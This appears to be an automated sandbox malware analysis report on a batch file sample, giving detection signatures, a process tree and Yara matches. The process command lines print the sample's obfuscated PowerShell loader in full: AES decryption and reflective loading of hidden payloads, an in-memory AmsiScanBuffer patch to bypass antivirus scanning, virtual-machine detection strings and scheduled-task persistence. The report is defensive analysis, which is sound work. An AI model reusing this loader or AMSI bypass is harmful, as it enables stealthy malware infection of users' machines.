

Windows Analysis Report
rbx-CO2.bat

Overview

General Information

Sample name: rbx-CO2.bat
Analysis ID: 1524982
MD5: d1324a085a54c035d136f7a73edec440
SHA1: 3049e422f937395d1d64e205ce5978182d3c2388
SHA256: 6a25d0ca74a29596a0c09f26acbe9f85a46d5c1c886a6860dc915d94ffbbbe5a
Tags: azure-winsecure-combatuser-smica83
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Found large BAT file
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6824 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 1336 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 3192 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • WMIC.exe (PID: 356 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 1804 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 7116 cmdline: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = 
$tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 6444 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • WerFault.exe (PID: 5660 cmdline: C:\Windows\system32\WerFault.exe -u -p 6444 -s 2396 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • cmd.exe (PID: 3000 cmdline: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4140 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 2244 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 5608 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 3804 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • findstr.exe (PID: 2976 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
            • WMIC.exe (PID: 2432 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • findstr.exe (PID: 4232 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
            • cmd.exe (PID: 5560 cmdline: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • powershell.exe (PID: 7088 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
              • WerFault.exe (PID: 1804 cmdline: C:\Windows\system32\WerFault.exe -u -p 7088 -s 2212 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • WerFault.exe (PID: 2680 cmdline: C:\Windows\system32\WerFault.exe -u -p 7088 -s 2104 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • schtasks.exe (PID: 3804 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • conhost.exe (PID: 2976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 4044 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 4000 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • powershell.exe (PID: 6936 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • powershell.exe (PID: 640 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:thuUFdhjXkHq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yFLwIFejWheBPy,[Parameter(Position=1)][Type]$NxINIPbKxv)$yMLVqpDcpHk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$yMLVqpDcpHk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'me,M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$yMLVqpDcpHk.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+'k'+[Char](101)+'',''+'P'+''+'u'+''+'b'+'li'+'c'+''
+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$NxINIPbKxv,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $yMLVqpDcpHk.CreateType();}$tBOzPEeXdclpo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+''+'m'+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'icr'+'o'+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+'v'+''+'e'+'Met'+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$YOhLAkBIOfDYUh=$tBOzPEeXdclpo.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+''+'r'+''+'o'+''+[Char](99)+'A'+'d'+''+[Char](100)+'re'+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('Pu'+[Char](98)+'l'+'i'+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DyGxdRsDFLitOyBSDtJ=thuUFdhjXkHq @([String])([IntPtr]);$xwWcsbJiItNzaRumjCNQuH=thuUFdhjXkHq 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$poeTVxHWVZq=$tBOzPEeXdclpo.GetMethod(''+'G'+''+'e'+''+'t'+'M'+'o'+'d'+[Char](117)+'l'+'e'+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$HcKZyefBJpvKrT=$YOhLAkBIOfDYUh.Invoke($Null,@([Object]$poeTVxHWVZq,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+'i'+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$nXtMNPKuSorvJxsIp=$YOhLAkBIOfDYUh.Invoke($Null,@([Object]$poeTVxHWVZq,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+'r'+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$XeqQGMF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HcKZyefBJpvKrT,$DyGxdRsDFLitOyBSDtJ).Invoke(''+[Char](97)+''+'m'+''+'s'+''+'i'+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'');$IPJIfzrUhQjJlmTUH=$YOhLAkBIOfDYUh.Invoke($Null,@([Object]$XeqQGMF,[Object](''+[Char](65)+'ms'+[Char](105)+''+'S'+''+'c'+'an'+[Char](66)+''+[Char](117)+'ffe'+[Char](114)+'')));$GrxNgCPqmZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nXtMNPKuSorvJxsIp,$xwWcsbJiItNzaRumjCNQuH).Invoke($IPJIfzrUhQjJlmTUH,[uint32]8,4,[ref]$GrxNgCPqmZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$IPJIfzrUhQjJlmTUH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nXtMNPKuSorvJxsIp,$xwWcsbJiItNzaRumjCNQuH).Invoke($IPJIfzrUhQjJlmTUH,[uint32]8,0x20,[ref]$GrxNgCPqmZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+'T'+'W'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+'r'+''+[Char](98)+''+[Char](120)+''+[Char](45)+'s'+[Char](116)+''+'a'+''+'g'+'e'+[Char](114)+'')).EntryPo
int.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 6400 cmdline: C:\Windows\System32\dllhost.exe /Processid:{8d1ed557-2027-497c-a325-29d4d11b1321} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 560 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 652 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 996 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 436 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 376 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 60 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 980 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1064 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1140 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1192 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1248 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1328 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1344 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1356 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1448 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1516 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1560 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1640 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • Conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 6444 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x439282:$b2: ::FromBase64String(
  • 0x4392e0:$b2: ::FromBase64String(
  • 0x4b1ee4:$b2: ::FromBase64String(
  • 0x4b32f3:$b2: ::FromBase64String(
  • 0x43358a:$s1: -join
  • 0x4bfbcc:$s1: -join
  • 0x4c47b3:$s1: -join
  • 0x50e1c7:$s1: -join
  • 0x51b29c:$s1: -join
  • 0x51e66e:$s1: -join
  • 0x51ed20:$s1: -join
  • 0x520811:$s1: -join
  • 0x522a17:$s1: -join
  • 0x52323e:$s1: -join
  • 0x523aae:$s1: -join
  • 0x5241e9:$s1: -join
  • 0x52421b:$s1: -join
  • 0x524263:$s1: -join
  • 0x524282:$s1: -join
  • 0x524ad2:$s1: -join
  • 0x524c4e:$s1: -join
Process Memory Space: powershell.exe PID: 7088 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x52:$b2: ::FromBase64String(
  • 0x7db02:$b2: ::FromBase64String(
  • 0x9efa1:$b2: ::FromBase64String(
  • 0x9efff:$b2: ::FromBase64String(
  • 0x996c4:$s1: -join
  • 0xd397b:$s1: -join
  • 0xd425f:$s1: -join
  • 0x8f109:$s3: Reverse
  • 0x940f9:$s4: +=
  • 0x9419b:$s4: +=
  • 0x978e3:$s4: +=
  • 0x99399:$s4: +=
  • 0x995af:$s4: +=
  • 0x996a6:$s4: +=
  • 0xce7d5:$s4: +=
  • 0xce7f4:$s4: +=
  • 0xce82f:$s4: +=
  • 0xce84c:$s4: +=
  • 0xce887:$s4: +=
  • 0xce8f3:$s4: +=
  • 0xce97f:$s4: +=

System Summary

Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object 